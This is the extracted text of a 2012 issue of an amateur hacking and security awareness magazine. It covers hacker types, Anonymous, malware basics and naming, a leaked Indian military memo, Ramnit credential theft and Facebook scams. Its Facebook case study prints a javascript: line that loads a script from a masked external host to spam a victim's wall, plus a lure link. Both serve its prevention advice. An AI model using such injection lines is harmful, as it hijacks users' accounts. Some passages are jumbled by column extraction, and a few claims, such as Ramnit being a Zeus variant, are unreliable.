Anonymous ? ! intro about Anoymous hackers.

Indian Military Docs Stolen Cofidential Memo leaked on web.

Who names the Malwares ? Info about computer malware.

Issue 01 Volume 01

Editorial
Belated happy new year to all my readers and friends. I thank, all you guys for downloading this magazine. ImHaker is here to make awareness among people about computer security, hacking and hackers. Magazine will also informative for the security professionals & people who are learning. When you learn to break the security, you can able to create a better security. Now a day most of the computer viruses spread through user interaction, for example malicious links with a catchy headline, that will attract the user to fall into the hole. So the people should be educated to prevent themselves from this kind of problems. ImHaker features different categories you can enjoy such as hacking, security, malware, and case studies. Hope you guys will enjoy this issue. ImHaker is a new born baby it needs your support to stand up.

Content
Haker Events 04 Hacked by Anonymous ?! 08 Banking malware targets Facebook 12 Who names the malware? 16 Geek Jokes 22 Who is a hacker? 06 Indian Military Docs stolen! 10 What is a Malware? 14 Facebook scams and Viruses* 18 Tech View 24

- Gowtham

2 IImHaker Magazine

[*Cover Story]

ImHacker Magazine 3

IMHAKER

January 2012

Haker Events
SyScan12 Singapore When: Sunday, 15 Jan 2012 Where: Swissotel Merchant Court Hotel, Singapore http://www.syscan.org/index.php/sg/cfp SANS Security East 2012 When: January 17 - 26, 2012 Where: Sheraton New Orleans ,New Orleans, LA http://www.sans.org/security-east-2012/ ShmooCon 2012

(Jan-Feb 2012)

NDSS Symposium 2012 When:Sun, Feb 5, 2012 - Thu, Feb 9, 2012 Where:San Diego, California USA http://www.isoc.org/isoc/conferences/ndss/

13th Annual Privacy and Security Conference When: 16 February - 17 February 2012 Where: Victoria Conference Centre, BC, Canada http://www.rebootconference.com/privacy2012/

SANS 2012 North American SCADA Summit When: January 21 - 29, 2012 Where: Lake Buena Vista, FL http://www.sans.org/info/91501

CODASPY12 Second ACM Conference on Data and Application Security and Privacy When: 08 Feb 2012 - 12 Feb 2012 Where: San Antonio, TX, United States http://www.codaspy.org/

SANS Secure India 2012 When: 20 Feb 2012 - 25 Feb 2012 Where: Bangalore, India http://www.sans.org/info/83954

When: Fri, Jan 27, 2012 - Mon, Jan 29, 2012 Where: Washington, DC USA http://www.shmoocon.org/

SANS Phoenix 2012 SCALE 10x - 2012 Southern Linux Expo When January 20 - 22, 2012 Where: Hilton LAX - Los Angeles, CA USA http://www.socallinuxexpo.org SANS Monterey 2012 When: January 30 - February 4, 2012 Where: Monterey, CA http://www.sans.org/info/91506 Nullcon Goa 2012 Cyber Crime Conference (CCC) 2012 When:Fri, Jan 20, 2012 - Sat, Jan 28, 2012 Where:Atlanta, Georgia USA http://www.dodcybercrime.com/ InfoSec Southwest 2012 WhenWednesday, 1 Feb 2012 WhereAustin, Texas http://www.infosecsouthwest.com/cfp.html ESSoS 12 International Symposium on Engineering Secure Software and Systems When: 16 Feb 2012 - 17 Feb 2012 Where: Eindhoven, Netherlands http://goo.gl/EBPkh When: February 15 - 18, 2012 Where: Goa, India http://www.nullcon.net/site/conference.php When: February 13 - 18, 2012 Where: Phoenix, AZ http://www.sans.org/info/91511

RSA Conference 2012 When: Mon, Feb 27, 2012 - Sat, Mar 2, 2012 Where: San Francisco, California USA http://www.rsaconference.com/

You Shot The Sherif 6 (YSTS 6) When: Sunday, 26 Feb 2012 Where: Sao Paulo, Brazil (map) http://www.ysts.org/

BSidesVienna 2012 When: January 21, 2012 Where: TBA http://goo.gl/8Fcjk

4 IImHaker Magazine

BugCON Security Conference 12 When: February 2 - 3, 2012 Where: Mexico City, Mexico http://www.bugcon.org

FC12 Financial Cryptography and Data Security 2012 When: 27 Feb 2012 - 02 Mar 2012 Where: Bonaire, Netherlands Antilles http://fc12.ifca.ai/
ImHacker Magazine 5

IMHAKER

January 2012

Who is a Hacker ?
Hackers are heros of the cyber world!
In general hacking is the art of modifying things customized as you wish. In computer security hacking is the process of finding vulnerability and uses them to break in to the system. Hackers are the ultimate skilled people, who have knowledge in all fields of computer and technology. Basic characteristics of hackers are, They were skilled in programming, reverse engineering, networking, hardware and more. They will do hack things for money, dispute or adventure. They can able to think offensive as well as defensive. If you want to be a web designer you need to think creatively, learn PHP, HTML, CSS and other web oriented languages, for a software engineer you need to think logically, learn C++, JAVA, Perl, VB, C#, .NET and so on and for a database administrator you need to know MySQL, SQL, ORACLE and so on.
6 IImHaker Magazine

Based on the skill level, the Elite hacker stands top as most skilled person. Next to that script kiddie is a non-expert person who breaks into system by using pre-packed automated tools. The new person who is learning computer hacking is known as newbie or n00b or neophyte. In a special case we have Blue hat hackers who work in software firms as penetration or application testers. Microsoft uses the term blue hat to represent a series of security briefings. A hacktivist is the person who broken into systems for announcing social, ideological, religious or political message. Most of the hacktivism involves website defacement (changing the home page of a website to notifying that the website has been hacked or any other message) and DoS attacks

But if you want to be hacker you need to learn all these things and expertise in it. Hackers can be categorized by their attitude as well as their skill level too. A white hat hacker is the person who hack things ethically. They get agreement signed by the owners to hack things and submit report on the system security and vulnerabilities. White hat hackers formally known as Security Professionals. On the other hand malicious hackers who crack things illegally without the owners permission for some personal protest or profit. They are formally known as crackers. In the combination of black and white hat, we have Grey hat hackers who may surf the internet and hack into computer systems for the sole purpose of notifying the administrator that their system has been hacked and then they may offer to repair their system for a small fee.

H A C K I N G

IMHAKER

January 2012

Hacked by Anonymous ?!
A hacktivist group
Anonymous is a concept that spreads via internet originated in 2003. It represents the concept of many online community users simultaneously existing as a society without a publicly enforced government or violently enforced political authority, digitalized global brain. In its early form, the concept has been adopted by a decentralized online community acting anonymously in a coordinated manner, usually toward a loosely selfagreed goal, and primarily focused on entertainment. Beginning with 2008, the Anonymous collective has become increasingly associated with collaborative, international hacktivism, undertaking protests and other actions, often with the goal of promoting internet freedom and freedom of speech. Actions credited to Anonymous are undertaken by unidentified individuals who apply the Anonymous label to themselves as attribution. Anonymous has defined them-self as, We [Anonymous] just happen to be a group of people on the internet who need just kind of an outlet to do as we wish, that we wouldnt be able to do in regular society. ...Thats more or less the point of it. Do as you wish. ... Theres a common phrase: we are doing it for the lulz. Still, experts are not sure that the collective, whose members hide behind the mask of legendary British freedom fighter Guy Fawkes, which is quickly became the symbol of this group. Definitions tend to emphasize the fact that the concept, and by extension the collective of users, cannot be readily encompassed by a simple definition.

The Hacktivisms involved by Anonymous

Year
2006-07 2008 2009 2010 2011 Project No

Operations
Habbo raids, Hal Turner raid, Chris Forcand arrest. Chanology, Epilepsy Foundation forum invasion, Defacement of SOHH and All HipHop websites. Club, 2009 Iranian election Operation Didgeridie. protests,

Cussing

Operation Titstorm, Oregon Tea Party raid, Operations Payback, Avenge Assange, and Bradical, Operation Leakspin, Zimbabwe. Attack on Fine Gael website, Arab Spring Activities, Attack on HBGary Federal, Purported threat against the Westboro Baptist Church, 2011 Wisconsin protests, 2011 Bank of America document release, Operation Sony, Spanish Police, Supporting 2011 Indian Anti-corruption movement in cyber space, Operation Malaysia, Operation Orlando, Operation Intifada, Operation AntiSecurity, Operation Facebook, Operation BART,, Support of Occupy Wall Street, Operation Syria, Operation DarkNet, Opposition to Los Zetas, Operation Brotherhood Takedown, Operation Blackout, Operation Mayhem, Attack on Lt. John Pike, Attack on Stratfor. Occupy Nigeria.

2012

Instead it is often defined by aphorisms describing perceived qualities. One self-description is: We are Anonymous. We are Legion. We do not forgive. We do not forget. Expect us. In July, 2011 FBI arrests 16 people in the United States for the hacking attacks by anonymous group and a sixteen year old was arrested in London who goes by the hacker handle Tflowand is believed to be key member of LulzSec. AnonOps Communications, which is a news website about Anonymous has reports that Anonymous fights for The Pirate Bay Which is a famous BitTorrent website recently blocked by finnish government and the SOPA (Stop-Online-Piracy-Act)

H A C K I N G

8 IImHaker Magazine

ImHacker Magazine 9

IMHAKER

January 2012

Backdoor access in the secured network

An Indian hacker group named The Lords of Dharmaraja has broken into the Indian military network and stole critical documents and signed agreements.

Indian Military Docs stolen!

Backdoor access provided by Nokia, RIM and Apple ?!?

Officials in India could not be reached for comment. According to the memo, which was prepared on October 6 last year, the backdoor was reportedly opened by Nokia, Apple and RIM in exchange of doing This is the same group who had business in Indian market. leaked the source code of Norton Anti-virus reported that, Indian Since MI (military intelligence) military intelligence officials have has no access to USCC LAN (local been reportedly given backdoor area network) limited to VPN, POP access for digital surveillance by servers (communication gateways) Nokia, Apple and Research In Motion etc, and they are primary target (RIM), which makes Blackberry concerning PRC (Peoples Republic of China), decision was made earlier phones. this year to sign an agreement with The memo revealed that the mobile manufacturers in exchange backdoor was allegedly used by for Indian market presence, the Indian intelligence to spy on officials memo read. of United States-China Economic and Security Review Commission Alan Hely, senior director of (USCC). USCC officials on Monday corporate communications at told Reuters that the organization Apple, told TOI that the company has contacted relevant authorities would not like to comment on the to investigate the matter. The leaked memo. But I can deny that news agency reported the USCC backdoor access was provided, did not dispute the authenticity of he said. A Nokia spokesperson intercepted mails that were cited in too refused to comment on the specifics of the matter but said, The the leaked memo.
10 IImHaker Magazine

the privacy of customers and their data seriously and is committed to comply with all applicable data protection and privacy laws. RIM refused to comment on this specific case. However, the Canadian company that makes BlackBerry phones says in its guidelines it has no ability to provide its customers encryption keys to anyone and that it maintains a consistent global standard for lawful access requirements that does not include special deals for specific countries. While electronic surveillance and wiretapping is often a necessity to check crime and for national security purposes, the law usually only allows for it on a case-to-case basis. It is not clear at the moment if the alleged backdoor access provided by Nokia, RIM and Apple was used for en masse surveillance in India. As more and more people connect to the digital world, governments across the world are looking to tap into the networks, often with the help of private companies, for information gathering and spying

S E C u r i t y

ImHacker Magazine 11

Banking Malware Targets Facebook

Zeus a malware, which was discovered in 2010 and used to target on stealing banking/financial data. The source code of the Zeus has been leaked on the web last year has been amended by hackers to steal Facebook information, according to researchers from seculert, an enterprise-focused internet security company.

IMHAKER

January 2012

Use below link to see the Facebook Security Infography, http://goo.gl/suixg

Ramnit a modified version of Zeus

their friends, thereby magnifying the malwares spread even further. Ramnit was not initially designed to harvest Facebook credentials, but the Ramnit maintainers have recognized the value of Facebook accounts for propagation. Whereas email can be easily spoofed and is therefore more likely to be ignored, receiving communication from a trusted contact on Facebook will have much higher click-through rates. Victims are simply not aware that the trusted Facebook account, from which the communication was received, may itself have already been compromised. Aliases:

Chart published by Seculert.

The Malware variant Ramnit is known to be a modified version of Zeus. Win32/Ramnit is a family of multi-component malware that infects Windows executable files, Microsoft Office files and HTML files. Win32/Ramnit spreads to removable drives, steals sensitive information such as saved FTP credentials and browser cookies. The malware may also open a backdoor to await instructions from a remote attacker. The attackers behind Ramnit are using the stolen credentials to login to victims Facebook accounts and to transmit malicious links to

Type_Win32 (Kaspersky) Win32/Zbot.A (AVG) W32/Infector.Gen2 (Avira) Win32/Ramnit.A (CA) Win32.Rmnet (Dr.Web) W32.Infector (Ikarus) W32/Ramnit.a (McAfee) W32/Patched-I (Sophos) PE_RAMNIT.A (Trend Micro)

Symptoms: The following system changes may indicate the presence of this malware: The presence of the following file Srv.exe.

S E C u r i t y

Seculert said they provided Facebook with a complete list of compromised accounts. They noted that the tendency to recycle password could play a role in using the harvested Facebook credentials to access VPN services, email, and various other accounts online.

Ramnit recently stole over 45,000 Facebook login credentials; 96 percent of which were from the UK or France. Facebook hasnt been the only target for Ramnit, It was able to gain remote access to financial institutions, compromise online banking sessions and penetrate several corporate networks. Facebook clarified that over half of these logins were either invalid or had old/expired passwords. The company has initiated remedial steps for all affected users to ensure the security of their accounts and have begun working with our external partners to add protections to our anti-virus systems to help users secure their devices

12 IImHaker Magazine

ImHacker Magazine 13

IMHAKER

January 2012

What is a Malware?
Basics of Malicious Software
Malware is a software program whose intent is malicious or whose effects are malicious. The spectrum of malware covers a wide variety of specific threats, including viruses, worms, Trojan horses and spyware. There are several techniques to detect, detain & destroy malwares. Have you ever think how big an impact does malware really have? It is important to know, because if computer security is to be treated as risk management, then you have to accurately assess how much damage a lapse in security could cause. The cost of the malware can be computed in two ways, first the real cost of malware are that which are apparent and which are relatively easy to calculate. If your computers software or hardware component is damaged by virus, the cost to replace it would be straight forward to assess. If your companys computer is affected by virus, so that the cost and time spend by Byour technical team to repair it can be considered as real cost. The hidden costs are the costs whose impact cant be measured accurately, and may not even known. For example, the bank and financial companies could suffer damage to their reputation from a publicized malware incident. Regardless of the business, a leak of prietary information or customer data caused my malware could result in enormous damage to a company, no different than industrial espionage. Any downtime could drive existing customers to a competitor or turn away new, potential customers. The Basic characteristics of malware are, Self-replicating malware actively attempts t propagate by creating new copies or instances of itself. Malware may also propagate passively, by user copying it accidentally.

Malwares in the wild are different in characteristics, size and infection level
Population growth describes the overall change in the number of malware instances due to self-replication. Malware that doesnt self-replicate will always have zero population growth, but malware with a zero population growth may self-replicate. Parasitic Malware requires some other executable code in order to exist.executablein the sense anything that can be executed, such as boot codeonadisk, binary codeinapplicationsandinterpretedcode. It also includes source code, like application scripting languages and code that may require compilation before being executed Malware type
Logic Bomb Trojan Horse Back Door Virus Wrom Rabbit Spyware Adware

self-replicating population parastitic growth

No No No Yes Yes Yes No No Zero Zero Zero Positive Positive Zero Zero Zero Possibily Yes Possibily Yes No No No No

M A L W A R E

Table contains the malware type and its characteristics

14 IImHaker Magazine

ImHacker Magazine 15

Who names the Malware?

Unfortunately, there isnt a central naming authority for malwares.
When a new piece of malware is spreading, the top priority of antivirus companies is to provide an effective defence, quickly. Coming up with a catchy name for the malware is secondary concern. Typically the primary, human-readable name of a piece of malware is decided by the anti-virus researcher who first analyses the malware. Names are often based on unique characteristics that malware has, either some feature of its code or some effect that it has. Unfortunately, there isnt a central naming authority in the near future, for two reasons. First, the current speed of malware spreading precludes checking with a central authority in a timely manner. Second, it isnt always clear what would need to be checked, since one distinct piece of malware may manifest itself in a practically infinite number of ways. General form of malware names: Bagle.C E-Mail worm.win32.Bagle.c W32.Bagle.C@MM WIN32/Bagle.c@MM Malware type: It refers to the type of malware, Such as Trojan, Worm. Platform specifier: The operating environment in which malware runs. WIN32 represents a 32-bit windows operating system. VBS represents a Visual Basic Script. Family name: It is the human-readable name of the malware that is usually chosen by the anti-virus researcher performing the analysis. Variant: Usually a malware tends to be released multiple times with minor changes. This change referred as variant of the malware. Variants commonly assigned with letters in increasing order of discovery. Example: aaa.A -> aaa.B -> aaa.C and so on as Z gives way to AA. Modifiers: Modifiers supply additional information about the malware. For example, MM stands for Mass Mailing

IMHAKER

January 2012

M A L W A R E

16 IImHaker Magazine

IImHaker Magazine 17

IMHAKER

January 2012

Facebook Scams and Viruses

HOW DO THEY DO THAT?

At first the attacker writes a JavaScript containing malicious code that will get the number of posts and what to post on the wall from the user by simply entering the likely code, javascript:(a = (b = document).createElement(script)).src = //********. com/*****.js, b.body.appendChild(a); void(0) After this code being executed your wall will be full of replicated spam posts.

HOW TO PREVENT?
These kinds of attacks are potentially unpredictable as because they were done by new/unidentified person who uses the fake profile for this use. Once you have experienced this kind of attack, report the post to Facebook as spam and immediately block the respected user from your Facebook settings. If this attack was done by one of your well-known friend, then alert him/her to change their own Facebook password. Because their account may be compromised

2. Second, the Facebook scam post viral attack. This attack uses

the social engineering techniques to target the users, such as Osama-bin-ladens death news, Actress scam videos, Pornography/ Violence videos or any trendy news at the peak of that time. An example of pornography scam video attack looks like this, [VIDEO] DAD CATCHES DAUGHTERS ON WEBCAM [OMGGGG].AVI [LINK]

c A s e s d y

Facebook is regularly being used by millions of people around the world; it has been take placed in some peoples daily activities list too. This makes Facebook as a hot target for online scammers and black SEO marketers. Every day lot of people were infected by various malwares roaming around Facebook.

1. The Facebook wall post attack, that is used in link marketing or

some people do this to make fun of their friends. This will be done with a javascript which was uploaded in an external web server. It is really annoying if your Facebook Wall is full with many messages. Sometimes the replicated copies of the same message itself will be filled in your wall. Recently many SEO Marketers used to spam post on the users wall.
18 IImHaker Magazine

IImHaker Magazine 19

IMHAKER

January 2012

On December, 2011 the Italian actress Marika Fruscio was a victim of an infamous wardrobe malfunction during a soccer show on Italian TV. The video of the incident went viral and is now being used as a bit in this scam. There are also a number of Marika Fruscio fan pages on Facebook.

ONE OF YOUR FACEBOOK FRIENDS NAME] is in leading role in this video but victim will not be able to watch the video and he/she will be promoted to download the Adobe Flash player plugin, victim will download the Flash player from the link given in same page so that flash player is NOT Original Flash Player plugin, actually it is a backdoor developed vary smartly to get access of your computer.

HOW TO PREVENT?
While Facebook on its part is actively taking steps for a safer Facebook experience, the responsibility also lies with the user. 1. Be a sceptic. Doubt the authenticity of every link that you click. 2. As a rule, dont trust short URLs always. 3. Do not enter your Facebook credentials on any website whose URL doesnt begin with www.facebook.com. 4. It could be a foe hiding behind your friend. Because your friends account couldve been compromised and is being used to spread malware. 5. Match the content and the character of the person. If you staid college professor is posting a link on hot babes, raise a red flag. 6. Some scams and spams try to trigger your curiosity. And curiosity killed the cat. So dont bother and just delete. 7. Anyone promising you easy money or anything of desire could actually be luring you into a trap. Stay away. No free iPads. 8. If any communication on Facebook asks you to copy and paste some code to the address bar of your browser, dont. 9. If clicking on a link isnt meant to ask for a software installation, asks you to download/install. Stop. It could be malware. 10. You can also enable Login Approvals from the Account Security of your accounts setting page. This will add an additional layer of security to your Facebook account. 11. Also many of those fun apps can end up doing more harm than fun. Be selective about the apps you want to add. 12. It is also a good idea to like Facebook Security (http://www. facebook.com/security) so that you can keep a tab on all the security related updates on Facebook. 13.If you find any content that is spammy or scammy, report it as spam or scam. 14. If you are a Firefox user, then use the security add-ons such as WOT and NoScript to prevent the malicious links being clicked

This scam is one of the many on Facebook that use the clickjacking technique to trick users into revealing confidential information and giving unauthorised access to their computers.

HOW DO THEY DO THAT?

Someone from your Facebook Friends list will say you Wanna laugh?? Watch my video here http://94.xxx.4x.5x/100000?xxxxxxxx (xxxx is random numbers i.e http://94.xxx.4x.5x/100000?134068738 ) or Message would be like this Hello How are you? your friend XYZ is in leading role in this video check it out http://94.113.44.57/100000?13406 8738 If victim will reply this message then victim will get some random messages in reply from the virus infected friends Facebook account. Obviously victim (In case you) will click on the link and the script associated to that video will automatically liked by yourself and posted on your entire friends wall. These actions will be done behind the scenes, Meanwhile a web page will opens the website which will look same like vary known and leading video broadcasting site YouTubes video page where the title of video will be something like this

c A s e s d y

20 IImHaker Magazine

IImHaker Magazine 21

IMHAKER

January 2012

Geek Jokes!
G A M e F u n

Social games in Facebook becomes annoying to most of the users!

Where is the ANYKEY ?

22 IImHaker Magazine

.
IImHaker Magazine 23

Tech View

IMHAKER

January 2012

Watch these two phones at action on video, goo.gl/eyLGx and goo.gl/0q7sk

Huawei ascend P1 s vs Fujitsu F-07 d worlds tHinnest smartPHone runs on android

VictorinoX swiss armY unVeils PocKet-siZed teraBYte storaGe deVice at tHe 2012 international consumer electronics sHow

Some key features and benefitsof the Victorinox SSD include: Worlds smallest high-capacity SSD drive on the market to-date. Variety of storage capacities: 64GB, 128GB, 256GB, and 1 terabyte. Worlds only SSD device with only one connector that fits into USB2/3 and eSATA 2/3 connectors. Worlds only SSD device with a Bi-Stable graphic display (E-Paper software) for labeling contents. Handles automatic backup and synchronization issues in un-hacked AES 256 security (combination hardware and software). Each SSD comes equipped with two knife bodies, between which the drive can easily be interchanged-one is flight-friendly and the other includes traditional Swiss Army Knife implements (blade, scissors, nail file/screw driver combo)

T E c H N o

At the worlds greatest tech show, Consumer Electronics Show (CES) 2012, the year that two smartphones duked it out for the title of the worlds thinnest smartphone.Huawei Ascend P1 S -Thinness: 6.68mm Picture-1 & Fujitsu F-07 D - Thinness: 6.7mm - Picture -2

24 IImHaker Magazine

ImHacker Magazine 25

IMHAKER

January 2012

WE NEED YOU TO HELP US !

ImHaker is stepping up its first step in the cyber world. We want you to suggest any new topics to be included and any changes you want us to do in the magazine. In order to satisfy your needs, we need your help by any form of feedback. We are planning to increase the number of pages in the Magazine. So you can expect more hacking and fun on our next issue which is going to be published on February 01, 2012. Visit us at: Mail us at: http://www.imhaker.com feedback@imhaker.com

The entire information shared in this magazine are strictly for educational purpose & to improve the security defence attitude to prevent hacker attacks. Do not abuse any information provided by ImHaker magazine. If you cause any damage to your own or any others properties directly or indirectly by the information provided, ImHaker Magazine and the authors are not responsible for that. Hacking is a crime, if it is implemented illegally. Secure yourself and help others

Disclaimer

26 IImHaker Magazine